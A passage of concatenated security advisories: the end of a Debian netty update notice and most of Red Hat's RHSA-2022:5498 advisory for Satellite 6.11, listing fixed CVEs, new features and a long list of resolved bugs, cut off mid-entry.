content-length header 1945710 - CVE-2021-28163 jetty: Symlink directory exposes webapp directory contents 1945712 - CVE-2021-28164 jetty: Ambiguous paths can access WEB-INF 1946341 - CVE-2021-22696 cxf: OAuth 2 authorization service vulnerable to DDos attacks 1948001 - CVE-2021-3536 wildfly: XSS via admin console when creating roles in domain mode 1948752 - CVE-2021-29425 apache-commons-io: Limited path traversal in Apache Commons IO 2.2 to 2.6 1962879 - CVE-2020-15522 bouncycastle: Timing issue within the EC math library 1965497 - CVE-2021-28170 jakarta-el: ELParserTokenManager enables invalid EL expressions to be evaluate 1970930 - CVE-2021-3597 undertow: HTTP2SourceChannel fails to write final frame under some circumstances may lead to DoS 1971016 - CVE-2021-28169 jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory 1973392 - CVE-2021-30468 CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter 1974854 - CVE-2021-22118 spring-web: (re)creating the temporary storage directory could result in a privilege escalation within WebFlux application 1974891 - CVE-2021-34428 jetty: SessionListener can prevent a session from being invalidated breaking logout 1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS 1981527 - CVE-2021-30129 mina-sshd-core: Memory leak denial of service in Apache Mina SSHD Server 1991299 - CVE-2021-3690 undertow: buffer leak on incoming websocket PONG message may lead to DoS 1995259 - CVE-2021-37714 jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value 5. For the stable distribution (buster), these problems have been fixed in version 1:4.1.33-1+deb10u2. We recommend that you upgrade your netty packages. For the detailed security status of netty please refer to its security tracker page at: https://security-tracker.debian.org/tracker/netty Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmBrXn0ACgkQEMKTtsN8 TjYiIQ/+M3dHpXdXRxZlx12OSJNsJoZa52/7uKhM9Vg0HhdCYnq7RjXTI2zZmUu7 VbL/F1ixPFgHWZpFIwHPTxZ4qk5+qQKYj7JyU1g+NyL9MkVsAW7ccYj3gbp3Kgk6 bE2GEwfh0qSKDgolflLCudGsqF1J54T65kO5oQ+Gtbx/8+NJ0YrVrHsmG1O4IMHQ 6oK/znY6CmQtUSY1p8DCNTWp63hZYpGzg9Umv/y9TaYm3QeG1BNz3tQz8uaGZQWq LihkaTSpJoo7ezNUFYinaRECylpEf7MHgK+uYkJ0MZrZ+2wyMC6V0BATVwF2Aj7X VMrRBJTSf20z5u/k0m+y9k8cR8CcR3sWVo/7mpRJAIsvnyMQwKBmxjHSlVfzOqYK 91NB7OSi/ZDKOOsdQ5oW337FPQolCXl2DOe2UW9Z1K9XFs11VplsFxMkrzZtiwba dXhq6odVZwQfzjiWGj0yFftfJSAAs9B0I1L1EqW2QR7sN25YA1OosYsc5iYvUXD7 mhjU1RtqsXK3jI9TjGmXos+6Yj36iPncNwXBL4AKKPapV5qm6mHQkXTowW1NM5vu 8NokTjKtuixgb08CAQHNe202TpQ9kGHNTe2FDKRNFQrlTaoxt2DlmHbDiLn6i1Ue k4HImGqrUw9venxQ/vPZjTW6UaTbz0D9BPQcb9ApBOAgydEjJqE= =6i6I -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Satellite 6.11 Release Advisory ID: RHSA-2022:5498-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2022:5498 Issue date: 2022-07-05 CVE Names: CVE-2021-3200 CVE-2021-3584 CVE-2021-4142 CVE-2021-21290 CVE-2021-21295 CVE-2021-21409 CVE-2021-30151 CVE-2021-32839 CVE-2021-33928 CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 CVE-2021-41136 CVE-2021-42550 CVE-2021-43797 CVE-2021-43818 CVE-2021-44420 CVE-2021-44568 CVE-2021-45115 CVE-2021-45116 CVE-2021-45452 CVE-2022-22818 CVE-2022-23633 CVE-2022-23634 CVE-2022-23833 CVE-2022-23837 CVE-2022-28346 CVE-2022-28347 ==================================================================== 1. Summary: An update is now available for Red Hat Satellite 6.11 2. Relevant releases/architectures: Red Hat Satellite 6.11 for RHEL 7 - noarch, x86_64 Red Hat Satellite 6.11 for RHEL 8 - noarch, x86_64 3. Description: Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Security Fix(es): * libsolv: Heap-based buffer overflow in testcase_read() in src/testcase.c (CVE-2021-3200) * satellite: foreman: Authenticate remote code execution through Sendmail configuration (CVE-2021-3584) * candlepin: Allow unintended SCA certificate to authenticate Candlepin (CVE-2021-4142) * candlepin: netty: Information disclosure via the local system temporary directory (CVE-2021-21290) * candlepin: netty: Possible request smuggling in HTTP/2 due missing validation (CVE-2021-21295) * candlepin: netty: Request smuggling via content-length header (CVE-2021-21409) * tfm-rubygem-sidekiq: XSS via the queue name of the live-poll feature (CVE-2021-30151) * python-sqlparse: ReDoS via regular expression in StripComments filter (CVE-2021-32839) * libsolv: various flaws (CVE-2021-33928 CVE-2021-33929 CVE-2021-33930 CVE-2021-33938) * tfm-rubygem-puma: Inconsistent Interpretation of HTTP Requests in puma (CVE-2021-41136) * logback-classic: Remote code execution through JNDI call from within its configuration file (CVE-2021-42550) * candlepin: netty: Control chars in header names may lead to HTTP request smuggling (CVE-2021-43797) * python-lxml: HTML Cleaner allows crafted and SVG embedded scripts to pass through (CVE-2021-43818) * python3-django: Potential bypass of an upstream access control based on URL paths (CVE-2021-44420) * libsolv: Heap overflow (CVE-2021-44568) * python3-django: Various flaws (CVE-2021-45115 CVE-2021-45116 CVE-2021-45452 CVE-2022-22818) * tfm-rubygem-actionpack: Information leak between requests (CVE-2022-23633) * tfm-rubygem-puma: rubygem-rails: Information leak between requests (CVE-2022-23634) * python3-django: Denial-of-service possibility in file uploads (CVE-2022-23833) * tfm-rubygem-sidekiq: WebUI Denial of Service caused by number of days on graph (CVE-2022-23837) * python3-django: Various flaws (CVE-2022-28346 CVE-2022-28347) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: * New repo layout for Satellite, Utils, Maintenance, and Client repos. * Support for RHEL 9 clients * Module-based installation on RHEL 8 * Upgrading Satellite Server and Capsule Server installations from RHEL 7 to RHEL 8 * Connected and Disconnected servers supported on RHEL 7 and RHEL 8 * Inter-Server Synchronization improvements * Puppet integration optional and disabled by default * Pulp 3 updated to Python 3.8 * Change to Capsule certificate archive * New default port for communication with Red Hat Subscription Management * (RHSM) API on Capsule servers * New Content Views Page (Content Publication workflow simplification) * New Hosts Page (Technology Preview) * Registration and preview templates * Simplified host content source changing * Improved behavior for configuring and running remote jobs * Provisioning improvements * New error signaling unsupported options in TASK-Filter * Virt-who configuration enhanced to support Nutanix AHV * Cloud Connector configuration updated * Improved Insights adoption The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section. 4. Solution: For Red Hat Satellite 6.11 see the following documentation for the release. https://access.redhat.com/documentation/en-us/red_hat_satellite/6.11 The important instructions on how to upgrade are available below. https://access.redhat.com/documentation/en-us/red_hat_satellite/6.11/html/upgrading_and_updating_red_hat_satellite 5. Bugs fixed (https://bugzilla.redhat.com/): 1459231 - [RFE] Support 'cleaning' a repo of downloaded on_demand content 1473263 - Processing outputs of remote command on the smart-proxy is slow. 1545000 - [RFE] As a user of Satellite, I would like to use another Satellite as my CDN. 1596004 - Cannot register host with activationkey that is associated to host collections that have host count limits 1609543 - concurrently creating repositories causes most of them are not visible for consumer at the end 1659649 - [RFE] Shorten or handle "410 Gone" errors rather than printing a page-long trace for each 1662924 - [RFE] Report that lists all the hosts on which a particular repository is enabled 1685708 - Editing a host tries to inherit the operating system properties from it's host-group instead of the CV and Lifecycle Environment assigned 1693733 - ensure foreman-maintain works with RHEL8 Satellite & Capsules 1694659 - [RFE] Host Add-Parameter button should not float down page as new params are added. 1713401 - RHEL 8 systems with OSPP applied cannot install katello-ca-consumer package from Satellite 6.5 1723632 - When restarting foreman-tasks, long running tasks got forcefully killed after 20 seconds of wait. 1723751 - [RFE] Provide a script-like interface to task cleanup, preventing wrong values from being entered 1735540 - Virt-who-config for kubevirt does not support in API and hammer CLI 1744521 - There is no way to identify the overriden Ansible variables while creating or editing an existing host 1761421 - [RFE] Option to "skip-tags" on Ansible runs from Red Hat Satellite server. 1770075 - Snippet template may render incorrect result when non-default scope class is used to render the main template. 1771724 - Move Actions::Katello::Host::UploadPackageProfile out of dynflow 1777820 - [RFE] Make hammer-cli available for RHEL 8 systems 1784254 - Static recurring job failed to schedule on 2nd iteration if any of the target host record is invalid. 1805028 - Issue with hammer shell while using "--fields" parameter to display host info 1807258 - Cloned viewer role cannot view facts 1807536 - Parent Hostgroup hammer parameter accept only name, not title 1809769 - [RFE] support ability disable and remove puppetserver from Satellite and Capsules 1811166 - REX job failed when you enable FIPS on RHEL 8 hosts 1813624 - Consistent use of unlimited-host argument throughout CLI 1819309 - [RFE] Load balanced capsules without using sticky sessions 1825761 - Ansible Role execution reports do not show Ansible Icon 1832858 - [RFE] Exporting a content view does not exports the description assigned to the content view. 1844848 - [RFE] add "duration" column to tasks hammer and export 1845471 - exclude source redhat containers by default 1847825 - Incorrect text alignment for error message 1851808 - Unable to set ssh password and sudo password when creating a REX job using hammer 1852897 - API - ISE when using invalid status type 1862140 - ipv4/6 auto-suggested address should be removed when the different domain and subnet with ipv6/4 are selected 1867193 - Content Host Traces Management modal window does not respect selection done on the previously opened page 1869351 - [RFE] Add ability to omit specific hosts from rh_cloud inventory upload 1872688 - Remote execution will fail on client with FIPS enabled 1873241 - [RFE] When choosing what capsule to use for Remote Execution into a host, use the host's "Registered through" capsule 1877283 - [RFE] Request to use /etc/virt-who.conf as the default config file for virt-who plugin 1878049 - Cancel button should be enabled in the capsule sync until the job completions 1881668 - hammer user list --help has invalid --order example 1883612 - [RFE] - Needs Dot Bullet to distinguised environment for Composite Content View on Red Hat Satellite Web UI 1883816 - Appropriate error message to be shown when creating authsource with same name as existing authsource. 1886780 - [Sat 6.8/UI/Bug] Refresh icon doesn't go away 1893059 - Satellite 6.8 Remote Execution fails on RHEL 8.2 clients with DEFAULT:NO-SHA1 crypto policy 1896628 - Hammer Command Fails to List Job Invocation Details if Organization is Used 1898656 - [RFE] Include status of REX jobs on the Satellite Dashboard 1899481 - [RFE] - Tasks: Need Word Wrap for Long Commands 1902047 - [RFE] In the message "Repository cannot be deleted since it has already been included in a published Content View" , include the name of CV and it's versions 1902314 - [RFE] Introduce check-only or dry-run feature for any kind of Ansible based job execution from Satellite 6 1906023 - ssh debug logging on FIPS causes REX job failure with OpenSSL::Digest::DigestError 1907795 - Remove the MS Windows provisioning Templates from the RedHat Satellite 6 1910433 - REX is not possible on RHEL 8 when FUTURE crypto policy is set from Satellite 6.8 1911545 - Epoch version is missing from rpm Packages tab of Content View Version 1914803 - Some of the "filters" permission changed after the upgrade. 1915394 - [RFE] Adding an option to keep the ansible-runner files on Satellite. 1919146 - [RFE] Possibility for further tailoring with Compliance Viewer role 1920579 - The private bookmark status is not reflected correct in satellite GUI and we cannot make a private bookmark public through Red Hat Satellite GUI 1922872 - Autosearch is not working even if its enabled. 1923766 - Inconsistent time format on Sync Plans Details page 1924625 - Sync status showing never synced even though the repositories has been synced successfully 1927028 - CVE-2021-21290 netty: Information disclosure via the local system temporary directory 1927532 - Large CRL file operation causes OOM error in Candlepin 1931489 - Timeout to kill settings in job execution is not honored when running an Ansible playbook 1937364 - CVE-2021-21295 netty: possible request smuggling in HTTP/2 due missing validation 1937470 - hammer does not have a compute resource associate VMs command as web UI has 1940308 - [BUG] The / at the end of proxy url is not being handled by satellite correctly when trying to enable repositories 1942806 - AttributeError occured when run python 3 bootstrap.py on RHEL9.0 Alpha 1944802 - [RFE] List of all Enabled Repository of all the content hosts using Reporting Templates. 1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 1951626 - Validate Content Sync on bulk product produces error messages 1955385 - Privilege escalation defined inside ansible playbook tasks is not working when executing the playbook via Remote Execution in Satellite 6 1957070 - [RFE] add 'name' for the role filter in API 1957288 - [RFE] Add option in the satellite to upload/sync OVAL defination to evalute the rule (xccdf_org.ssgproject.content_rule_security_patches_up_to_date) when performing Compliance scan on the client registered with the Satellite server. 1958664 - [RFE]? Replace?bcrypt hash function with (FIPS-approved / NIST recommended) encryption algorithm for internal passwords?in the Satellite. 1959691 - [Tuning] Tuning Puma in the predefined tuning profiles 1960228 - Template is written twice when resolving provisioning templates for a host 1962307 - CVE-2021-3200 libsolv: heap-based buffer overflow in testcase_read() in src/testcase.c 1962410 - VMs Migrating are Losing ELS Subscriptions and Repos for RHEL 6 1962847 - foreman-rake katello:* fails with the error message The Dynflow world was not initialized yet 1964394 - Warning: postgresql.service changed on disk, when calling foreman-maintain service restart 1965968 - Since Satellite 6.8 it's not possible to remove subscriptions from 'WebUI --> Content --> Subscriptions' page if the user doesn't have 'Setting' permissions. 1967319 - The /api/usergroups/:usergroup_id/external_usergroups API is not accepting 1-group as the name of usergroup 1968439 - CVE-2021-3584 foreman: Authenticate remote code execution through Sendmail configuration 1969748 - Hammer documentation for "hammer organization create --help" command has unnecessary and repeated description 1969992 - Exclude pulp-2to3-migration package from Satellite 7.0 1970482 - Discovery plugin ignores IPv6 when doing reboot/kexec/fetch facts 1972501 - After promoting the content view, Candlepin failed to mark the entitlement certificates as dirty 1973146 - [RFE] As a user I want to receive an email notification when a job I triggered fails 1974225 - Incremental CV update does not auto-publish CCV 1975321 - select all button selects recommendation for other organizations which fails remediation action(JobInvocation). 1978323 - [RFE]: Include curve25519sha256 support in Remote Execution 1978689 - [global registration] [hammer] - No proper alignment in host-registration generate-command -h command 1979092 - Capsule cname is reported as opposed to hostname 1979907 - [RFE] IPv6 fact is not being parsed for satellite hosts. 1980023 - satellite-installer times out during long running SQL DELETE transactions 1980166 - Too many libvirt connections from Satellite due to ssh connection leaks 1982970 - Fact updates causing unnecessary compliance recalculation in Candlepin 1988370 - [RFE] Support Nutanix AHV in the Satellite virt-who plugin 1992570 - Only Ansible config jobs should run in check mode 1992624 - Remote Execution fails to honor remote_execution_connect_by_ip override on host 1992698 - Store certain parts of dynflow data as msgpack 1994212 - Failed at scanning for repository: undefined method `resolve_substitutions' for nil:NilClass 1994237 - Executing any foreman-rake commands shows 'ErbParser' and 'RubyParser' are ignored. 1994397 - Increased memory usage of pulp-3 workers during repo sync 1994679 - Host - Last Checkin report template is not showing any other content host apart from Red Hat Satellite itself. 1996803 - Grammatical errors with Insecure help text at Host Registration 1997575 - Lifecycle Environment tab flash OSTree & Docker details for a second then shows actual content path. 1997818 - "Login Page Footer Text" Blocking Login Button on Satellite UI 1998172 - Puppet classes and environment importer. documentation opens in same tab instead of a new one 1999604 - Unable to assign ansible roles to a host group via hammer/api with non-admin user 2000699 - CVE-2021-33928 libsolv: heap-based buffer overflow in pool_installable() in src/repo.h 2000703 - CVE-2021-33929 libsolv: heap-based buffer overflow in pool_disabled_solvable() in src/repo.h 2000705 - CVE-2021-33930 libsolv: heap-based buffer overflow in pool_installable_whatprovides() in src/repo.h 2000707 - CVE-2021-33938 libsolv: heap-based buffer overflow in prune_to_recommended() in src/policy.c 2000769 - pulp3: CV publishes with dependency solving and same source repos for copy are not concurrent 2002995 - hammer completion not working 2004016 - httpboot not working on GRUB version provided by RHEL7 2004158 - Sat 6.9.5: foreman-rake facts:clean aborts due to foreign key in database 2004234 - [RFE] Email notification after a job template execution completes. 2004335 - [RFE] API and Hammer functionality for Red Hat Access Insights in satellite 6 2005072 - CVE-2021-32839 python-sqlparse: ReDoS via regular expression in StripComments filter 2007655 - Authorization repository causing invalid upstream url 2008809 - Task is failing but still showing success state 2009049 - pulp_rpm: Basic-auth repository causing invalid upstream url 2009398 - hammer host interface update does not update remote execution setting 2010138 - Satellite doesn't forward the "If-Modified-Since" header for /accessible_content endpoint to Candlepin 2011062 - cockpit webconsole login fails when remote execution configured for kerberos 2013495 - CVE-2021-41136 rubygem-puma: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in puma 2013503 - CVE-2021-30151 sidekiq: XSS via the queue name of the live-poll feature 2013837 - Improve REX error reporting when uploading script 2014037 - There is a new login account in satellite 6.9 2014244 - Remove Greedy DepSolving from UI 2014251 - Global Registration: Selecting Satellite URL as the proxy fails to register hosts with default config 2018263 - Using Satellite with a proxy produces an SELinux alert 2020329 - [RFE] Switch process output to DB 2021255 - Satellite schedules one recurring InventorySync::Async::InventoryScheduledSync per org but each task syncs all orgs, resulting in harmless but unnecessary tasks 2021352 - [RFE] One manifest version to cover all of Satellite 7 2021406 - syncing tens of repos to capsule can cause deadlock: while updating tuple (...) in relation "core_content" 2021985 - [BUG] Upgrading Satellite 6.9 with custom certificates to Satellite 6.10 beta will cause the same problem to occur as BZ# 1961886 2022648 - please update to Satellite Ansible Collection 3.0.0 2023809 - Satellite 6.10 upgrade fails with PG::NotNullViolation: ERROR: column "subscription_id" contains null values 2024269 - Attempt of upgrading Satellite server to 6.7 or 6.8 stops with message "Please run 'foreman-maintain prep-6.10-upgrade' prior to upgrading." when using latest rubygem-foreman_maintain package 2024553 - Repository sync jobs are failing with the Exception "NoMethodError undefined method `repository_href' for nil:NilClass" post upgrade to satellite version 6.10 2024889 - Syncing RHEL 5 KS repository fails with: " Artifact() got an unexpected keyword argument 'sha' " 2024894 - Unable to sync EPEL repositories on Satellite 6.10 when 'Mirror on Sync' is enabled 2024963 - Syncing EPEL repos on Satellite 6.10 fails with: "Incoming and existing advisories have the same id but different timestamps and non-intersecting package lists.." 2024978 - Satellite upgrade to 6.10.1 fails with multiple rubygem-sinatra package dependency errors 2024986 - CV publish fails with: No route matches {:action=>"show", :controller=>"foreman_tasks/tasks", :id=>nil}, missing required keys: [:id] (ActionController::UrlGenerationError) 2025049 - Executing remove-pulp2 after a successful Satellite 6.10 upgrade breaks synchronizations and repositories. 2025437 - New OS created due to facts mismatch for operatingsystem for RHSM, Puppet and Ansible 2025494 - Capsule sync task failed to refresh repo that doesn't have feed url with "bad argument (expected URI object or URI string)" error 2025523 - Ansible roles are not starting automatically after provisioning 2025760 - installer does not restart foreman.service when changing puma configuration 2025811 - Upgrading to Satellite 6.9.6 and above introduces an increase in system memory consumption causing Pulp activities to fail with OOM at certain times 2026239 - Config report upload failed with "No smart proxy server found on ["capsule.example.com"] and is not in trusted_hosts" 2026277 - null value in column "manifest_id" violates not-null constraint error while syncing RHOSP container images 2026415 - RFE: Add command for upgrading foreman-maintain to next major version 2026658 - Fix name & path to OS host_init_config template 2026718 - XCCDF Profile in Tailoring File selecting the first id not the selected id 2026873 - Date parse error around SCA cert fetching when system locale is en_AU or en_CA 2027052 - The redhat.satellite.foreman plugin is unable to collect all facts for the target systems as expected when using default api 2027968 - A failed CV promote during publish or repo sync causes ISE 2028178 - CVE-2021-44420 django: potential bypass of an upstream access control based on URL paths 2028205 - db:seed can fail when there are host mismatches 2028273 - Cannot pull container content - TypeError: wrong argument type String (expected OpenSSL/X509) 2028377 - [RFE] add option to export and import just repository for hammer content-export 2028446 - Pulp: Add options to change the import and export path in /etc/pulp/settings.py 2028733 - katello-change-hostname fails to perform changes, leaving the system in an unusable state 2029192 - Applying errata from the errata's page always tries to use katello-agent even when remote_execution_by_default set to true 2029375 - webhook event "build_exited" never gets triggered 2029385 - selinux denials when accessing /etc/pulp/certs/database_fields.symmetric.key 2029548 - Excluding system facts logs as WARN causing log files to increase dramatically 2029760 - Scenarios for Satellite and Capsule 7.0 2029807 - foreman-maintain service fails for external postgres service, when no psql utility installed 2029828 - TFTP Storage check fails on undefined method `[]' for nil:NilClass 2029829 - change hostname tries to unconditionally restart puppetserver 2029914 - FIPS enabled RHEL7 server: Candlepin services not running after installation 2030101 - No longer be able to import content into disconnected Satellite for existing content views 2030273 - The tasks generated by task export in html format are not sorted by date 2030434 - Repository sync download all metadata files on every sync, even when there is no new packages 2030460 - Need a way to sync from a specific content view lifecycle environment of the upstream organization 2030715 - hammer content-[import,export] uses /tmp directory for temporary decompression location 2031154 - After upgrading to Satellite 6.10, Repository sync randomly fails if a ReservedResource exists in core_taskreservedresource table of pulpcore DB. 2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling 2032098 - Incremental publish content view doesn't copy any contents 2032400 - Remove warning from reports page in 7.0 2032569 - CVE-2021-43818 python-lxml: HTML Cleaner allows crafted and SVG embedded scripts to pass through 2032602 - Content not accessible after importing 2032928 - Puppet disable command fails 2032956 - Cannot create bookmark for credentials search 2033174 - Large repo sync failed with "Katello::Errors::Pulp3Error: Response payload is not completed" 2033201 - Button to assign roles on Host details page missing 2033217 - "Cannot find rabl template 'api/v2/override_values/index'" error while trying to import Ansible variables using hammer CLI. 2033336 - Add 'service restart' step in purge-puppet command 2033560 - CVE-2021-42550 logback: remote code execution through JNDI call from within its configuration file 2033593 - fact_values api performance issues when loading a large number of facts 2033847 - Content view export failed with undefined method `first' for nil:NilClass 2033853 - Publish content view failed with "PulpRpmClient::ApiError Error message: the server returns an error" 2033940 - Error: AttributeError: 'NoneType' object has no attribute 'cast' thrown while listing repository versions 2034317 - hammer repository upload-content with large file gives "Too many open files" error 2034346 - CVE-2021-4142 Satellite: Allow unintended SCA certificate to authenticate Candlepin 2034461 - Capsule failed to sync empty repositories 2034552 - Puppet disable command fails on Capsule 2034635 - New hosts UI, removal of Share your feedback link 2034643 - New hosts UI, when navigated back to host detail from jobs detail, old ui is shown instead of new 2034649 - New hosts UI, missing Ansible cards 2034659 - OSTree repository update error: `excludes` is not a valid attribute in `PulpOstreeClient::OstreeOstreeRemote` 2035195 - command "hammer full-help" gives error "Error: uninitialized constant HammerCLIForeman::CommandExtensions::PuppetEnvironment" 2035204 - Tags need to be truncated in rh_cloud report 2035480 - In Satellite upgrade, yum update failed to resolve the "createrepo_c-libs" dependency 2035907 - Ansible config report time is one hour off 2036054 - [Custom Certs] - Failed to install the custom certs on the Satellite 7.0.0 works fine in 6.10 2036187 - self-upgrade fails with x.y should be greater than existing version x.y.z! 2036381 - Applying exclude filter on a CV containing kickstart repos causes missing package groups 2036628 - Rex job fails Error loading data from Capsule: NoMethodError - undefined method `each' for nil:NilClass 2036721 - Satellite is creating the schedule on the wrong day of the week (day+1) 2037024 - CVE-2021-45115 django: Denial-of-service possibility in UserAttributeSimilarityValidator 2037025 - CVE-2021-45116 django: Potential information disclosure in dictsort template filter 2037028 - CVE-2021-45452 django: Potential directory-traversal via Storage.save() 2037180 - Failed to docker pull image with "Error: image <image name> not found" error 2037275 - Cockpit integration always fails with authentication error 2037508 - upload-content results in wrong RPM being added to product 2037518 - The RSS channel is set to the upstream URL 2037520 - Bootdisk new host page menu items are missing 2037648 - upgrade check checking group ownership of /var/lib/pulp (pulp2) instead of /var/lib/pulp/content (pulp3) 2037706 - Rex job fails: undefined method `join' for "RHSA-2012:0055":String 2037773 - The new host detail page should be enabled by default without the experimental warning 2038042 - Ansible Jobs are halting at status running 2038192 - Upgrade to Satellite 6.10 fails at db:migrate stage if there are errata reference present for some ostree\puppet type repos 2038241 - ERROR: at least one Erratum record has migrated_pulp3_href NULL value 2038388 - Activation key issue with custom products on RHEL 6 2038432 - Error when importing content and same package belongs to multiple repositories 2038849 - repositories-setup procedure failing with "undefined method `map' for "*":String" 2039289 - Installing Satellite7, satellite-installer runs redundant upgrade steps 2039696 - Puppet-related hammer commands still missing after plugin enabled 2040406 - Incorrect layout of new host details overview cards 2040447 - [RFE] Katello host detail tabs should accept URL params for search 2040453 - Limited CV docker tags cannot be pulled after syncing library repo with "limit sync tags" 2040596 - undefined method `name' for "":String" on "All Hosts" page 2040650 - Upgrade or offline backup fails on RHEL8 due to missing iptables command 2040773 - Updating repo with GPG key ID fails 2040796 - Grammar error on SyncPlan Details tab 2040870 - Error to import rhel7 kickstart on disconnected satellite 2041457 - Change ks= to inst.ks= and sendmac for RHEL 9 Beta 2041497 - Incremental CV update fails with 400 HTTP error 2041508 - Publication creation (during migration to pulp3 as well) can fail if /var/lib/pulp is NFS share 2041551 - Puppet enable fails on RHEL8 due to missing package(s) 2041588 - [RFE] Add Type to cdn configuration for 'disconnected' mode 2041701 - Fail to import contents when the connected and disconnected Satellite have different product labels for the same product 2042416 - Unclickable Class names in Configure > Puppet classes 2042480 - Configure Cloud Connector fails after hostname change; potentially hits all templates 2042848 - Package list of repository is empty page 2042861 - [Recurring Logic]logging for recurring logic should be more verbose 2043081 - 406 error appears when running insights-client --compliance 2043097 - sql dump of dynflow data is encoded, what breaks sosreport 2043144 - After upgrading to 6.10, Satellite fails to sync some repositories with large files with timeout error 2043248 - Importing content fails if an importer with same name already exists 2043501 - Satellite upgrade fails during db:seed with ActiveRecord::RecordNotDestroyed: Failed to destroy the record 2043609 - pulpcore-workers grow very large when repositories have many changelog entries 2043726 - content views configured as "import only" generate 404 errors during capsule sync 2044581 - CVE-2022-23837 sidekiq: WebUI Denial of Service caused by number of days on graph 2044606 - New version of Candlepin now has org in entitlement certificate and causes authorization issues 2044631 - duplicate key value violates unique constraint "core_repositorycontent_repository_id_content_id_df902e11_uniq" 2044839 - SSH Remote execution does not reap processes when closing multiplexed ssh connection 2045504 - Show all provisioning templates by default 2045854 - organization context fails to change in web UI 2046281 - usability issues for user without execute_jobs_on_infrastructure_hosts permissions 2046307 - New host details Errata overview card shows stale data for unregistered host 2046322 - Manager role does contain the execute_jobs_on_infrastructure_hosts permission 2046328 - Custom yum CV does not show correct list of packages 2046337 - Certain manifest, subscription and repository related actions are broken while using HTTP Proxy as content_default_http_proxy in Satellite 6.10 2046484 - RPM exclude filter does not work in web UI 2046573 - update puppet classes via API to empty puppet classes does not update the classes 2047285 - [RFE] enable redis cache for pulp content server by default 2047443 - Unable to Import any content via Import/Export 2047451 - [RFE] [SAT-4229] Packages - Filter by status 2047485 - syncing repo using proxy can generate misleading log entries when proxy deny access to the url requested 2047649 - please update to Satellite Ansible Collection 3.1.0 2047675 - Getting "404 not found" when publishing a content view 2047683 - Force cancel a paused task doesn't release the lock 2048470 - Leapp upgrade fails after reboot with disabled postgresql redis tomcat services 2048517 - service stop tries to execute CheckTftpStorage 2048560 - REX doesn't honor effective_user when async_ssh is true 2048775 - CVE-2022-22818 django: Possible XSS via '{% debug %}' template tag 2048778 - CVE-2022-23833 django: Denial-of-service possibility in file uploads 2048913 - "foreman-maintain health check --label check-hotfix-installed" fails with error "undefined method `[]' for nil:NilClass" 2048927 - Satellite 6.10 clone is looking for mongo_data.tar.gz file 2048986 - "foreman-maintain health check --label validate-yum-config" command failed with message "clean_requirements_on_remove=True Unset this configuration as it is risky while yum update or upgrade!" 2049143 - Unable to run Convert2RHEL role on the host 2049304 - katello-rhsm-consumer script subscription-manager version detection depends on subscription-manager rpm being installed 2049799 - Incremental update with --propagate-all-composites makes new CVV but with no new content 2049913 - Repo filtering shows all products and repos in different organizations 2050100 - Module streams enabled by default are gone when CV starts using filters 2050297 - Modifying 'Capsule tasks batch size for Ansible' causes subsequent Ansible jobs to hit TypeError 2050323 - Misleading error message when incorrect org label is entered 2050440 - pulp workers are idle despite there is one pending task 2051374 - wrong sinatra obsoletes makes Satellite uninstallable 2051408 - IP obfuscation algorithm can generate invalid IPs 2051468 - Active directory users taking too much time to login when its part of many groups. 2051522 - pulpcore_t and pulpcore_server_t domains are prevented to access httpd_config_t files 2051543 - smart_proxy_remote_execution_ssh leaves zombie ssh processes around 2051912 - Some of the services failed to start after satellite restore 2052048 - Repeated Ansible Role run scheduling adds extra time to specified start date 2052088 - Satellite-installer does not ensure proper permissions on /etc/foreman-proxy/ssl_ca.pem at every run 2052420 - Satellite upgrade fails during db:migrate with PG::DuplicateTable: ERROR: relation "index_hostgroups_puppetclasses_on_hostgroup_id" already exists 2052493 - restore on another machine fails with ERROR: web server's SSL certificate generation/signing failed 2052506 - "foreman-maintain health check --label check-hotfix-installed" does not display the modified files in command stdout. 2052524 - rubygem-sinatra el8 rpm should keep the epoch number 2052815 - dynflow fails with "403 extra bytes after the deserialized object" 2052958 - Job invocation fails for errata installation. 2053329 - content-view import fails with Error: PG::StringDataRightTruncation: ERROR: value too long for type character varying(255) 2053395 - Satellite upgrade failed with error "Couldn't connect to the server: undefined method `to_sym' for nil:NilClass" 2053478 - Uploading external DISA SCAP content to satellite 6.10 fails with exception "Invalid SCAP file type" 2053601 - Errata icons are the wrong colors 2053839 - Deletion of Custom repo fails with error "uninitialized constant Actions::Foreman::Exception" in Satellite 7.0 2053843 - hammer shell with redirected input prints stty error on RHEL8 2053872 - Changing Upstream URL of a custom repo in WebUI raises error "Upstream password requires upstream username be set." 2053876 - Multiple instances of scheduled tasks of more types 2053884 - Host detail UI setting is not honored when returning to the host page after canceling an Edit action 2053923 - InsightsScheduledSync raises exception when allow_auto_insights_sync is false 2053928 - Satellite UI suddenly shows "Connection refused - connect(2) for 10.74.xxx.yyy:443 (Errno::ECONNREFUSED) Plus 6 more errors" for a capsule even if there are no connectivity issue present in Satellite\Capsule 7.0 2053956 - Installing Satellite 7.0 on FIPS enabled RHEL 8.5 fails on "katello-ssl-tool --gen-ca" step with error "ERROR: Certificate Authority private SSL key generation failed" 2053970 - 